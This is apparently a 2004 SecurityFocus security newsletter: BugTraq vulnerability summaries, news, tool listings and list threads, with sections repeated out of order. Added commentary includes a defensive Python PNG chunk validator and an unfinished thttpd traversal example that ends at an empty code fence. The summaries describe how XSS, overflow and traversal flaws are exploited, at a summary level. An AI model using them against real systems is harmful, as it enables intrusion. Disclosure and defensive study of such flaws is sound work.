Attackers may exploit this vulnerability to obtain the authentication credentials of other forum users. If the domain hosts other applications, their credentials and/or other sensitive information (session IDs, etc) may be exposed.
III. SECURITYFOCUS NEWS ARTICLES
--------------------------------
1. Wardriving guilty plea in Lowe's wi-fi case
By: Kevin Poulsen
Federal prosecutors say a network engineer convicted for checking his e-mail over a hardware store's wi-fi network is likely the first U.S. wardriving conviction.
http://www.securityfocus.com/news/9281
2. Ashcroft wins Internet wiretap system
By: Kevin Poulsen
U.S. regulators vote to wire broadband networks for law enforcement surveillance.
http://www.securityfocus.com/news/9263
3. ATM keypads get a security boost
By: Kevin Poulsen
Credit card companies are responding to a host of high and low-tech attacks on the sanctity of your ATM code.
http://www.securityfocus.com/news/9161
4. Phishermen attack on a viral scale
By: John Leyden, The Register
The prevalence of some phishing attacks is beginning to rival even high-level viral outbreaks, according to email filtering firm MessageLabs.
http://www.securityfocus.com/news/9297
5. Price isn't right for new Bagle variant
By: John Leyden, The Register
Yet another variant of the mass-mailing Bagle worm began spreading widely yesterday.
http://www.securityfocus.com/news/9296
6. Phone spam misery looms Stateside
By: Andrew Orlowski, The Register
A little-noticed Bill before the Senate will ensure daily misery for US cellphone users, thanks to the inattentiveness of telecomms regulator the FCC.
http://www.securityfocus.com/news/9283
IV. SECURITYFOCUS TOP 6 TOOLS
-----------------------------
1. MonitorMagic - Server & Network Monitor 6.0
By: Tools4ever
Relevant URL: http://www.tools4ever.com/products/monitormagic/
Platforms: Windows 2000, Windows NT, Windows XP
Summary:
MonitorMagic is a proactive server and network monitoring and reporting tool for Windows 2003/XP/2000/NT servers, workstations and SNMP devices and supports agentless monitoring. MonitorMagic supports Windows and UNIX based resources such as memory, disk and CPU load and optionally records the values into a database to enable graphical trending and reporting. MonitorMagic ships with predefined policies for popular hardware and applications.
2. CipherPack Pro 3.2
By: VIO Systems Limited
Relevant URL: http://www.cipherpack.com
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
Encrypts and compresses files and data into a single Windows executable. The user just runs it and when the correct key is supplied, the file decrypts. Without the correct key, the original file contents can never be seen.
3. Savungan - Stateful Inspection Firewall for Windows with FUL... 2.0
By: Egemen Tas
Relevant URL: http://www.ModemWall.com/savungan.htm
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
Savungan is a stateful inspection firewall designed for Microsoft Windows platforms and available with FULL SOURCE CODE. It is an advanced filtering agent for TCP/IP based networks, with a very flexible rule language that makes packet inspection more powerful and effective. Security administrators have often had difficulty building and maintaining a suitable filtering infrastructure after deploying a firewall.
4. SSlDigger 1.0
By: Rudolph Araujo
Relevant URL: http://www.foundstone.com/s3i
Platforms: Windows XP
Summary:
SSL Digger looks at the SSL Ciphers that a web server supports. It produces a report and grades the site.
5. DiskLogon 1.0.17.112
By: DiskLogon Development Team
Relevant URL: http://www.disklogon.com/DiskLogon.exe
Platforms: Windows 2000, Windows XP
Summary:
DiskLogon, like a smart card logon, is software that enables you to log on to your computer with a removable disk.
DiskLogon saves you the trouble of entering your user name and password every time you log on. All you have to do is plug in your removable disk, and you can log on to your computer quickly and safely. When you unplug your removable disk, your computer will automatically lock for your safety.
6. UndeleteSMS 1.0
By: Arne Vidstrom
Relevant URL: http://vidstrom.net/downloads/undeletesms.exe
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
UndeleteSMS can recover deleted SMS messages from a GSM SIM card.
V. SECURITYJOBS LIST SUMMARY
----------------------------
1. [SJ-JOB] Sr. Security Analyst, Busto Arsizio (VA), I... (Thread)
Relevant URL:
VI. INCIDENTS LIST SUMMARY
--------------------------
5. Is this some type of scan (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/371085
VII. VULN-DEV RESEARCH LIST SUMMARY
-----------------------------------
NO NEW POSTS FOR THE WEEK 2004-08-03 to 2004-08-10.
VIII. MICROSOFT FOCUS LIST SUMMARY
----------------------------------
1. most avtive attack type (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/371283
2. SecurityFocus Microsoft Newsletter #200 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/370780
IX. SUN FOCUS LIST SUMMARY
--------------------------
1. Password recovery (Thread)
Relevant URL:
http://www.securityfocus.com/archive/92/371287
2. How to Restrict a user, not a root, Login to the Con... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/92/371161
3. trouble setting up routing (Thread)
Relevant URL:
http://www.securityfocus.com/archive/92/371160
4. ipv6 questions + solaris 9 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/92/371158
5. syslog logging (Thread)
Relevant URL:
http://www.securityfocus.com/archive/92/370904
X. LINUX FOCUS LIST SUMMARY
---------------------------
1. can Hopster traffic be blocked? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/91/371150
XI. UNSUBSCRIBE INSTRUCTIONS
----------------------------
To unsubscribe, send an e-mail message to sf-news-unsubscribe (at) securityfocus (dot) com from the subscribed address. The contents of the subject or message body do not matter. You will receive a confirmation request message which you will have to answer. Alternatively, you can visit http://www.securityfocus.com/newsletters and unsubscribe via the website.
If your email address has changed, email listadmin (at) securityfocus (dot) com and ask to be manually removed.
XII. SPONSOR INFORMATION
-----------------------
This issue sponsored by: SPI Dynamics
ALERT: How Hackers Use LDAP Injection to Steal Your Data and Bypass
Authentication
It's as simple as placing additional LDAP query commands into a Web form
input box giving hackers complete access to all your backend systems!
Firewalls and IDS will not stop such attacks because LDAP Injections are
seen as valid data.
Download this *FREE* white paper from SPI Dynamics for a complete guide to
protection!
http://www.securityfocus.com/sponsor/SPIDynamics_sf-news_040810
------------------------------------------------------------------------
I. FRONT AND CENTER
1. Deploying Network Access Quarantine Control (part 1 of 2)
2. Data Driven Attacks Using HTTP Tunneling
II. BUGTRAQ SUMMARY
1. Webcam Corp Webcam Watchdog sresult.exe Cross-Site Scripting...
2. MailEnable Content-Length Denial Of Service Vulnerability
3. Gnu Transport Layer Security Library X.509 Certificate Verif...
4. U.S. Robotics USR808054 Wireless Access Point Web Administra...
5. IBM Tivoli Directory Server LDACGI Directory Traversal Vulne...
6. Webbsyte Chat Denial Of Service Vulnerability
7. Mozilla and Netscape SOAPParameter Integer Overflow Vulnerab...
8. Sun Java Runtime Environment Remote XSLT Privilege Escalatio...
9. Horde IMP HTML+TIME HTML Injection Vulnerability
10. WHM AutoPilot Clogin.PHP Username/Password Information Discl...
11. BreakCalendar Multiple Remote Vulnerabilities
12. ripMIME MIME Attachment Decoding Weakness
13. StackDefender ObjectAttributes Invalid Pointer Dereference D...
14. PuTTY Modpow Integer Handling Memory Corruption Vulnerabilit...
15. StackDefender BaseAddress Invalid Pointer Dereference Denial...
16. Linux Kernel File 64-Bit Offset Pointer Handling Kernel Memo...
17. Pete Stein GoScript Remote Command Execution Vulnerability
18. Juniper Networks NetScreen SSHv1 Denial Of Service Vulnerabi...
19. DGen Emulator Symbolic Link Vulnerability
20. eNdonesia Search Form Cross-Site Scripting Vulnerability
21. LibPNG Graphics Library Multiple Remote Vulnerabilities
22. Jetbox One Plaintext Password Storage Vulnerability
23. Jetbox One Remote Server-Side Script Execution Vulnerability
24. WackoWiki TextSearch Cross-Site Scripting Vulnerability
25. PHP-Nuke Delete God Admin Access Control Bypass Vulnerabilit...
26. Acme thttpd Directory Traversal Vulnerability
27. Multiple Free Web Chat Denial Of Service Vulnerabilities
28. Gnome VFS 'extfs' Scripts Undisclosed Vulnerability
29. Gaim Multiple Unspecified MSN Protocol Buffer Overflow Vulne...
30. LILO gfxboot Plaintext Password Display Vulnerability
31. YaST2 Utility Library File Verification Shell Code Injection...
32. phpBB Fetch All SQL Injection Vulnerability
33. Neon WebDAV Client Library Unspecified Vulnerability
34. PSCP Modpow Base Integer Handling Buffer Overrun Vulnerabili...
35. Oracle Multiple Unspecified Vulnerabilities
36. LibPNG Graphics Library Unspecified Remote Buffer Overflow V...
37. Opera Remote Location Object Cross-Domain Scripting Vulnerab...
38. Mozilla Browser Input Type HTML Tag Unauthorized Access Vuln...
39. Mozilla Browser/Thunderbird SendUIDL POP3 Message Handling R...
40. Mozilla Browser Non-FQDN SSL Certificate Spoofing Vulnerabil...
41. CVSTrac filediff Remote Command Execution Vulnerability
42. Microsoft Internet Explorer mms Protocol Handler Executable ...
43. Mozilla SSL Redirect Spoofing Vulnerability
44. Thomson SpeedTouch Home ADSL Modem Predictable Initial TCP S...
45. GNU Info Follow XRef Buffer Overrun Vulnerability
46. phpBB Login.PHP Cross-Site Scripting Vulnerability
III. SECURITYFOCUS NEWS ARTICLES
1. Wardriving guilty plea in Lowe's wi-fi case
2. Ashcroft wins Internet wiretap system
3. ATM keypads get a security boost
4. Phishermen attack on a viral scale
5. Price isn't right for new Bagle variant
6. Phone spam misery looms Stateside
IV. SECURITYFOCUS TOP 6 TOOLS
1. MonitorMagic - Server & Network Monitor 6.0
2. CipherPack Pro 3.2
3. Savungan - Stateful Inspection Firewall for Windows with FUL... 2.0
4. SSlDigger 1.0
5. DiskLogon 1.0.17.112
6. UndeleteSMS 1.0
V. SECURITYJOBS LIST SUMMARY
1. [SJ-JOB] Sr. Security Analyst, Busto Arsizio (VA), I... (Thread)
2. [SJ-JOB] Jr. Security Analyst, Busto Arsizio (VA), I... (Thread)
3. [SJ-JOB] CHECK Team Leader, London, GB (Thread)
4. [SJ-JOB] Account Manager, San Francisco, US (Thread)
5. [SJ-JOB] Sr. Security Analyst, Clearwater, US (Thread)
6. [SJ-JOB] Chief Security Strategist, Dallas, US (Thread)
7. [SJ-JOB] Security Consultant, Riyadh, SA (Thread)
8. [SJ-JOB] Quality Assurance, Santa Barbara, US (Thread)
9. [SJ-JOB] Security Product Manager, San Jose, US (Thread)
10. [SJ-JOB] Sr. Security Engineer, Boston, US (Thread)
11. [SJ-JOB] Evangelist, San Jose, US (Thread)
12. [SJ-JOB] Security Consultant, Indianopolis, US (Thread)
13. [SJ-JOB] Account Manager, New York, US (Thread)
14. [SJ-JOB] Security Consultant, Albany, NY, US (Thread)
15. [SJ-JOB] Security Consultant, San Francisco , US (Thread)
16. [SJ-JOB] Security Engineer, Eatontown, US (Thread)
17. [SJ-JOB] Security Consultant, Houston, US (Thread)
18. [SJ-JOB] Security Engineer, Washington, DC, US (Thread)
19. [SJ-JOB] Security Auditor, Miami, US (Thread)
20. [SJ-JOB] Security Engineer, New York (and NJ Metro A... (Thread)
21. [SJ-JOB] Management, Irvine, US (Thread)
22. [SJ-JOB] Security Consultant, Albany, US (Thread)
23. [SJ-JOB] Sales Engineer, Atlanta, US (Thread)
24. [SJ-JOB] Security Consultant, New York, US (Thread)
25. [SJ-JOB] Account Manager, Chicago, US (Thread)
26. [SJ-JOB] Sr. Security Engineer, Palo Alto, US (Thread)
VI. INCIDENTS LIST SUMMARY
1. New Mass Mailer Virus (Thread)
2. NDR +Hotmail & MSN (Thread)
3. distributed spamming/scamming scheme? (Thread)
4. Anyone else seeing SSH scans? (Thread)
5. Is this some type of scan (Thread)
VII. VULN-DEV RESEARCH LIST SUMMARY
NO NEW POSTS FOR THE WEEK 2004-08-03 to 2004-08-10.
VIII. MICROSOFT FOCUS LIST SUMMARY
1. most avtive attack type (Thread)
2. SecurityFocus Microsoft Newsletter #200 (Thread)
IX. SUN FOCUS LIST SUMMARY
1. Password recovery (Thread)
2. How to Restrict a user, not a root, Login to the Con... (Thread)
3. trouble setting up routing (Thread)
4. ipv6 questions + solaris 9 (Thread)
5. syslog logging (Thread)
X. LINUX FOCUS LIST SUMMARY
1. can Hopster traffic be blocked? (Thread)
XI. UNSUBSCRIBE INSTRUCTIONS
XII. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Deploying Network Access Quarantine Control (part 1 of 2)
By Jonathan Hassell
This article discusses Network Access Quarantine Control with Windows
Server 2003, which allows administrators to quarantine mobile users before
giving them full network access, by first ensuring these machines are
up-to-date according to a baseline security model.
http://www.securityfocus.com/infocus/1794
2. Data Driven Attacks Using HTTP Tunneling
By Ido Dubrawsky
In this article we will look at a means to bypass the access control
restrictions of a company's router or firewall. This information is
intended to provide help for those who are legitimately testing the
security of a network (whether they are in-house expertise or outside
consultants).
http://www.securityfocus.com/infocus/1793
II. BUGTRAQ SUMMARY
-------------------
1. Webcam Corp Webcam Watchdog sresult.exe Cross-Site Scripting...
BugTraq ID: 10837
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10837
Summary:
Reportedly Webcam Corp Webcam Watchdog is affected by a remote cross-site scripting vulnerability in the sresult.exe binary. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated web content.
As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of a legitimate user. Specifically the attacker can pass malicious HTML code as a value for the affected URI parameter supplied to 'sresult.exe'. All code will be executed within the context of the website running the vulnerable software.
2. MailEnable Content-Length Denial Of Service Vulnerability
BugTraq ID: 10838
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10838
Summary:
MailEnable is reported prone to a remote denial of service vulnerability. This vulnerability is reported to exist in the MailEnable HTTP header parsing code.
When reading a large content-length header field from an HTTP request, the operation overflows a fixed size memory buffer and the HTTP service will reportedly crash.
The vulnerability can be exploited to crash the affected HTTP service, denying service to legitimate users. The possibility to execute arbitrary code may also be present.
3. Gnu Transport Layer Security Library X.509 Certificate Verif...
BugTraq ID: 10839
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10839
Summary:
Reportedly Gnu Transport Layer Security Library (GnuTLS) is affected by a X.509 certificate verification denial of service vulnerability. This issue is due to a design error that causes the application to attempt to verify invalid X.509 certificates.
This issue would allow an attacker to cause the affected application to consume CPU resources and hang while attempted verification takes place, denying service to legitimate users.
4. U.S. Robotics USR808054 Wireless Access Point Web Administra...
BugTraq ID: 10840
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10840
Summary:
The USR808054 wireless access point is reported to contain a denial of service vulnerability in its embedded web server.
When malicious requests are received by the device, it will reportedly crash, denying service to legitimate users of the access point.
This issue can be exploited by anybody with network connectivity to the administration HTTP server, no authentication is required.
Version 1.21h of the device was found to be vulnerable, but other versions are also likely affected. Due to the practice of code-reuse in companies, it is also possible that other devices and products have this same flaw.
This BID may also be related to BID 6994, but this has not been confirmed.
5. IBM Tivoli Directory Server LDACGI Directory Traversal Vulne...
BugTraq ID: 10841
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10841
Summary:
IBM Tivoli Directory Server is reported to contain a directory traversal vulnerability in its web front-end application.
This issue presents itself due to insufficient sanitization of user-supplied data.
This issue allows remote attackers to view potentially sensitive files on the server that are accessible to the 'ldap' user. This may aid an attacker in conducting further attacks against the vulnerable computer.
Versions 3.2.2, and 4.1 are reported vulnerable.
6. Webbsyte Chat Denial Of Service Vulnerability
BugTraq ID: 10842
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10842
Summary:
Webbsyte Chat is reported susceptible to a denial of service vulnerability.
This issue presents itself when multiple simultaneous TCP connections are made to the chat server. When this occurs, the application will reportedly crash, denying service to legitimate users.
Version 0.9 was reported vulnerable. The application is not supported any longer, so it is unlikely that a fix will become available.
7. Mozilla and Netscape SOAPParameter Integer Overflow Vulnerab...
BugTraq ID: 10843
Remote: Yes
Date Published: Aug 02 2004
Relevant URL: http://www.securityfocus.com/bid/10843
Summary:
It is reported that Mozilla and Netscape contain an integer overflow vulnerability in the SOAPParameter object constructor. This overflow may result in the corruption of critical heap memory structures, leading to possible remote code execution.
An attacker can exploit this issue by crafting a malicious web page and having unsuspecting users view the page in a vulnerable version of Mozilla or Netscape.
Netscape 7.0, 7.1, and versions of Mozilla prior to 1.7.1 are known to be vulnerable to this issue. Users of affected versions of Netscape are urged to switch to Mozilla 1.7.1 or later, as new versions of Netscape are not likely to appear.
8. Sun Java Runtime Environment Remote XSLT Privilege Escalatio...
BugTraq ID: 10844
Remote: Yes
Date Published: Aug 03 2004
Relevant URL: http://www.securityfocus.com/bid/10844
Summary:
It has been reported that the Sun Java Runtime Environment is affected by an access validation vulnerability within the XSLT processor.
An attacker might exploit this issue to allow an untrusted applet or application to read data from a trusted applet or application that is running within the same virtual machine. It has also been reported that this issue may facilitate privilege escalation.
9. Horde IMP HTML+TIME HTML Injection Vulnerability
BugTraq ID: 10845
Remote: Yes
Date Published: Aug 03 2004
Relevant URL: http://www.securityfocus.com/bid/10845
Summary:
Reportedly Horde IMP is affected by an HTML injection vulnerability due to insufficient sanitization of HTML+TIME script.
An attacker can exploit this issue to gain access to an unsuspecting user's cookie based authentication credentials; disclosure of personal email is possible. Other attacks are also possible.
10. WHM AutoPilot Clogin.PHP Username/Password Information Discl...
BugTraq ID: 10846
Remote: Yes
Date Published: Aug 03 2004
Relevant URL: http://www.securityfocus.com/bid/10846
Summary:
WHM AutoPilot is reported prone to an information disclosure vulnerability. The issue is reported to exist due to a vulnerability in the functionality provided to permit an administrator to logon to WHM AutoPilot as another user.
It is reported that this vulnerability may be exploited by a remote attacker to disclose WHM AutoPilot usernames and passwords.
11. BreakCalendar Multiple Remote Vulnerabilities
BugTraq ID: 10847
Remote: Yes
Date Published: Aug 03 2004
Relevant URL: http://www.securityfocus.com/bid/10847
Summary:
Reportedly BreakCalendar is affected by multiple remote vulnerabilities. These issues are due to a failure to sanitize user-supplied input.
An attacker could leverage these issues to conduct cross-site scripting attacks and to perform actions facilitated by the 'add event' and 'edit/remove event' forms.
12. ripMIME MIME Attachment Decoding Weakness
BugTraq ID: 10848
Remote: Yes
Date Published: Aug 03 2004
Relevant URL: http://www.securityfocus.com/bid/10848
Summary:
It is reported that a weakness exists in ripMIMEs decoding routine.
If ripMIME is being used in conjunction with a virus scanning, or other similar type of application, this weakness has the affect of not passing the attachment to the engine. This means that the attachments will bypass the scanning process.
By bypassing the scanning process, the message may then be passed on to an end user while still containing virus, or other malicious code that should have been blocked by the filter.
Attackers may exploit this weakness by forming malicious content designed to pass through filtering software. This content is designed to be decoded by the end users MUA. Some MUAs may decode the MIME attachments, even though they are formed incorrectly, allowing the malicious content to be delivered.
Version 1.3.2.3 has been released which fixes this weakness.
13. StackDefender ObjectAttributes Invalid Pointer Dereference D...
BugTraq ID: 10849
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10849
Summary:
StackDefender is prone to a vulnerability that may permit attackers to crash the computer. This issue may be triggered if the program attempts to dereference an invalid pointer.
To exploit this issue, the attacker must be able to cause memory corruption on the host computer, such as through exploitation of buffer overflow in another application. This will force the software to attempt to block attempts to exploit the memory corruption vulnerability and in turn expose this vulnerability.
This issue is known to affect StackDefender 1.10.
14. PuTTY Modpow Integer Handling Memory Corruption Vulnerabilit...
BugTraq ID: 10850
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10850
Summary:
Reportedly PuTTY is affected by a remote, pre-authentication code execution vulnerability.
An attacker might leverage this issue to execute arbitrary code on an affected system. As this issue is exploitable before any authorization and before the host key is verified, any remote attacker can exploit this to gain unauthorized access to a vulnerable computer with the privileges of the user that started the affected application.
15. StackDefender BaseAddress Invalid Pointer Dereference Denial...
BugTraq ID: 10851
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10851
Summary:
StackDefender is prone to a vulnerability that may permit attackers to crash the computer. This issue may be triggered if the program attempts to dereference an invalid pointer.
To exploit this issue, the attacker must be able to cause memory corruption on the host computer, such as through exploitation of buffer overflow in another application. This will force the software to attempt to block attempts to exploit the memory corruption vulnerability and in turn expose this vulnerability.
This issue is known to affect StackDefender 2.0.
16. Linux Kernel File 64-Bit Offset Pointer Handling Kernel Memo...
BugTraq ID: 10852
Remote: No
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10852
Summary:
A vulnerability in the Linux kernel in the 64-bit file offset handling code may allow malicious users to read kernel memory. This issue is due to a design error that causes the affected code to fail to properly validate file pointers.
An attacker may leverage this issue to read arbitrary Linux kernel memory. This could allow an attacker to read sensitive data such as cached passwords. This issue will certainly aid in further attacks against the affected computer.
It has been reported that the Linux 2.6.X kernel, although still vulnerable, might not be exploitable. This BID will be updated when more information becomes available.
17. Pete Stein GoScript Remote Command Execution Vulnerability
BugTraq ID: 10853
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10853
Summary:
Pete Stein GoScript is prone to a remote command execution vulnerability.
This may allow remote attackers to perform unauthorized actions on a victim computer in the context of the hosting Web server.
18. Juniper Networks NetScreen SSHv1 Denial Of Service Vulnerabi...
BugTraq ID: 10854
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10854
Summary:
Juniper Networks NetScreen firewalls configured to run the SSHv1 service are reported prone to a denial of service vulnerability. It is reported that the vulnerability may be triggered by a remote attacker, prior to any form of authentication.
19. DGen Emulator Symbolic Link Vulnerability
BugTraq ID: 10855
Remote: No
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10855
Summary:
DGen is reportedly affected by a symbolic link vulnerability. This issue is due to a design error that fails to properly verify files prior to writing to them.
Successful exploitation of this issue will allow a local attacker to cause the affected application to overwrite arbitrary files with the privileges of the user that invoked the affected application. Reportedly this issue could be leveraged to facilitate privilege escalation.
20. eNdonesia Search Form Cross-Site Scripting Vulnerability
BugTraq ID: 10856
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10856
Summary:
It is reported that eNdonesia is susceptible to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated web content.
As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of a legitimate user. Specifically, the attacker can pass malicious HTML code as a value for the affected URI parameter supplied to 'mod.php'. All code will be executed within the context of the website running the vulnerable software.
This may allow for theft of cookie-based authentication credentials and other attacks.
Version 8.3 of the software is reported vulnerable. Other versions may also be affected.
21. LibPNG Graphics Library Multiple Remote Vulnerabilities
BugTraq ID: 10857
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10857
Summary:
The libpng graphics library is reported prone to multiple vulnerabilities. The following issues are reported:
It is reported that a stack-based buffer overrun vulnerability exists in the libpng library (CAN-2004-0597).
A remote attacker may exploit this condition, by supplying a malicious image to an unsuspecting user. When this image is viewed, the vulnerability may be triggered resulting in code execution occurring in the context of the user that viewed the malicious image.
A denial of service vulnerability is also reported to affect libpng (CAN-2004-0598).
A remote attacker may exploit this condition, by supplying a malicious image to an unsuspecting user. When the malicious image is viewed, a NULL pointer dereference will occur resulting in a crash of the application that is linked to the vulnerable library.
Additionally, several integer overrun vulnerabilities are reported to exist in png_handle_sPLT(), png_read_png() and other functions of libpng (CAN-2004-0599).
A remote attacker may exploit the integer-overrun conditions, by supplying a malicious image to an unsuspecting user. When the malicious image is viewed, an integer value may wrap, or be interpreted incorrectly resulting in a crash of the application that is linked to the vulnerable library, or may potentially result in arbitrary code execution.
This BID will be split into independent BIDs when further analysis of these vulnerabilities is complete.
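The three libpng issues above all start from length fields that a malicious image controls. The following Python is an added example, not libpng code and not from the advisory: a minimal PNG chunk walker that validates every chunk length against the specification limit and the bytes actually present before using it, plus an sPLT entry-count calculation with the underflow check that prevents the kind of wrap CAN-2004-0599 describes. The sPLT layout (palette name, NUL, sample depth, then 6- or 10-byte entries) is from the PNG 1.2 specification; the input files and the wrap illustration are constructed here.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
PNG_UINT_31_MAX = 0x7FFFFFFF  # the PNG specification caps a chunk length at 2^31 - 1


class PngError(ValueError):
    """Raised for any chunk that fails validation."""


def iter_chunks(data: bytes):
    """Yield (chunk type, payload) for each chunk in a PNG byte string.

    Every length field comes from untrusted input, so it is checked against
    the specification limit and against the bytes actually present before it
    is used to slice or to compute anything else.
    """
    if not data.startswith(PNG_SIGNATURE):
        raise PngError("missing PNG signature")
    pos = len(PNG_SIGNATURE)
    while pos < len(data):
        remaining = len(data) - pos
        if remaining < 12:  # length (4) + type (4) + CRC (4) is the minimum chunk size
            raise PngError("truncated chunk header at offset %d" % pos)
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        if length > PNG_UINT_31_MAX:
            raise PngError("chunk %r length %d exceeds PNG limit" % (ctype, length))
        if length > remaining - 12:
            raise PngError("chunk %r claims %d bytes, only %d remain"
                           % (ctype, length, remaining - 12))
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + payload) & 0xFFFFFFFF != crc:
            raise PngError("CRC mismatch in chunk %r" % ctype)
        yield ctype, payload
        pos += 12 + length
        if ctype == b"IEND":
            return


def check_png(data: bytes) -> str:
    """Return 'ok' when every chunk validates, otherwise the first error message."""
    try:
        for _ in iter_chunks(data):
            pass
    except PngError as exc:
        return str(exc)
    return "ok"


def splt_entry_count(payload: bytes) -> int:
    """Number of palette entries in an sPLT payload, computed without wraparound.

    sPLT layout (PNG 1.2): palette name (1-79 bytes), a NUL, a 1-byte sample
    depth (8 or 16), then entries of 6 or 10 bytes respectively.
    """
    name_end = payload.find(b"\x00")
    if name_end < 1 or name_end > 79:
        raise PngError("sPLT: invalid palette name")
    if len(payload) < name_end + 2:
        raise PngError("sPLT: missing sample depth")  # the check that prevents the wrap below
    depth = payload[name_end + 1]
    entry_size = {8: 6, 16: 10}.get(depth)
    if entry_size is None:
        raise PngError("sPLT: bad sample depth %d" % depth)
    remaining = len(payload) - name_end - 2  # cannot be negative after the check above
    if remaining % entry_size:
        raise PngError("sPLT: entry data is not a multiple of the entry size")
    return remaining // entry_size


def wrapped_u32_count(length: int, name_end: int, entry_size: int) -> int:
    """What the same arithmetic yields in unchecked 32-bit unsigned C.

    When length < name_end + 2 the subtraction wraps to nearly 2^32 and the
    resulting entry count is absurdly large, which is the class of integer
    overrun the advisory describes. Shown for contrast only.
    """
    return ((length - name_end - 2) & 0xFFFFFFFF) // entry_size


def make_chunk(ctype: bytes, payload: bytes) -> bytes:
    """Encode one well-formed chunk (used to build the constructed test input)."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def build_png(chunks) -> bytes:
    """Signature + the given chunks + IEND: a chunk stream, not a renderable image."""
    return PNG_SIGNATURE + b"".join(make_chunk(t, p) for t, p in chunks) + make_chunk(b"IEND", b"")


if __name__ == "__main__":
    good = build_png([(b"sPLT", b"pal\x00\x08" + bytes(12))])  # constructed: 2 entries of 6 bytes
    print(check_png(good), splt_entry_count(list(iter_chunks(good))[0][1]))
    forged = good[:8] + struct.pack(">I", 0x7FFFFFFF) + good[12:]  # tamper with the length field
    print(check_png(forged))
    print(wrapped_u32_count(4, 3, 6))
```

The two checks in iter_chunks are the ones that matter for a decoder written in C: the specification limit keeps the length from being treated as negative when stored in a signed 32-bit type, and the remaining-bytes check keeps a forged length from driving a read past the end of the buffer.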
22. Jetbox One Plaintext Password Storage Vulnerability
BugTraq ID: 10858
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10858
Summary:
It is reported that Jetbox One is prone to a plaintext password storage vulnerability.
A malicious user may use the sensitive data available from this vulnerability to launch further attacks against a vulnerable system.
It should be noted that although this vulnerability has been reported to affect Jetbox One version 2.0.8, other versions might also be affected.
23. Jetbox One Remote Server-Side Script Execution Vulnerability
BugTraq ID: 10859
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10859
Summary:
A vulnerability is reported to exist in Jetbox One that may allow a remote attacker to execute malicious scripts on a vulnerable system.
It is reported that an attacker may be able to place server side scripts in directories that could be accessed and executed later.
Successful exploitation of this issue may allow an attacker to execute malicious script code on a vulnerable server.
Version 2.0.8 is reported vulnerable to this issue. Other versions may also be affected.
24. WackoWiki TextSearch Cross-Site Scripting Vulnerability
BugTraq ID: 10860
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10860
Summary:
It is reported that WackoWiki is susceptible to a cross-site scripting vulnerability in its textsearch form. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated web content.
Exploitation of this vulnerability may allow for theft of cookie-based authentication credentials and other attacks.
25. PHP-Nuke Delete God Admin Access Control Bypass Vulnerabilit...
BugTraq ID: 10861
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10861
Summary:
PHP-Nuke is reported prone to an access control bypass vulnerability.
Reports indicate that a PHP-Nuke superuser may bypass access controls and privilege restrictions, to delete the PHP-Nuke "God Admin" account. This may be accomplished by making a specially crafted request for the "admin.php" script.
26. Acme thttpd Directory Traversal Vulnerability
BugTraq ID: 10862
Remote: Yes
Date Published: Aug 04 2004
Relevant URL: http://www.securityfocus.com/bid/10862
Summary:
It is reported that thttpd is susceptible to a directory traversal vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data. This issue only exists in the Windows port of the application, as the port does not account for the file system semantics of that platform when checking requested paths.
This issue may allow an attacker to retrieve arbitrary, potentially sensitive files, from the affected host computer, as the user that the thttpd process is running as.
Version 2.07 beta 0.4 of thttpd, running on a Microsoft Windows platform is reported vulnerable to this issue.
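The Windows-only nature of the thttpd issue is worth seeing concretely. The Python below is an added example, not thttpd code and not from the advisory; it assumes a document root of C:\thttpd\htdocs and a constructed request, and it assumes (the advisory does not say) that the platform difference at work is the backslash path separator, which the Windows file API accepts but a Unix-minded containment check ignores. The ntpath module is used so the Windows behaviour can be shown on any platform.

```python
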